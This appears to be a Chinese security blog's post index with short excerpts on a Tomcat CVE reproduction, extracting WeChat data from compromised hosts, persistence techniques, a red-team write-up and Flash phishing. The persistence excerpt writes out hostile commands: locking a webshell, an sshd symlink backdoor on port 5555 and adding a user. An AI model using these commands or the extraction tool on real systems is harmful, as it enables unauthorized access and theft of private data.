复现CVE-2019-0232过程中遇到的坑 Apache Tomcat高危远程代码执行漏洞
起因,一老哥给我发来这玩意,一眼看上去,哇,牛逼。 Apache Tomcat高危远程代码执行漏洞CVE-2019-0232:Windows上的Apache Tomcat远程执行代码 http:// localhost:8080/cgi-bin/hello.bat?&...
上线机器微信聊天记录提取
微信聊天记录提取 https://github.com/AdminTest0/SharpWxDump 版本 < 3.7.0.30 只运行不登录能获取个人信息,登录后可以获取数据库密钥 版本 > 3.7.0.30 只运行不登录不能获取个人信息,登...
权限维持 – 后门隐藏技术
文件上锁 chattr +i webshell.php lsattr webshell.php chattr -i webshell.php ssh 软链接 ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555; useradd test -p test 不死马 访问该 php 文...
某次重要攻防演练细节打点到攻陷内网分享
01成果概述 外网打点,先拿到JeecgBoot权限,再骚操作对若依系统GetShell 获取到某某有限公司多个主机权限和后台权限 后台权限:10.0.***.**:8848/nacos/#/ 10.0.***.***(服务器权限) 10.0.**...
漏洞复现-CVE-2023-46359
一:漏洞描述 Salia PLCC 提供的产品包括通信模块、智能电表、数据采集设备等,旨在帮助用户实现电力系统的远程监控、数据传输和智能化管理。他们的解决方案可以提高能源利用效率,改善电力系统...
【教程】Nginx 防火墙地区限制教程
地区限制都是7层的拦截、不是4层的拦截(所以拦截后返回的为444的状态码) 一、限制海外访问 海外及港澳台 这里代表的是 除了中国内陆以外的所有地区。就只能中国的IP访问 二、限制国内某些省份...
Llama 3 正式发布!性能怎么样? 附最新下载安装教程 !轻松实现本地部署,完全免费开源!
Llama 3 大模型下载安装:https://xsx.tw/ai/4177/更简单的安装方法:https://xsx.tw/ai/4135/
Flash网页钓鱼
简介 Flash钓鱼攻击是一种网络攻击手段,旨在欺骗用户访问伪造的Flash更新页面,并诱使他们下载并安装恶意软件。这种攻击通常利用用户对Flash更新的需求,以及对合法更新网站的信任。攻击者通常...
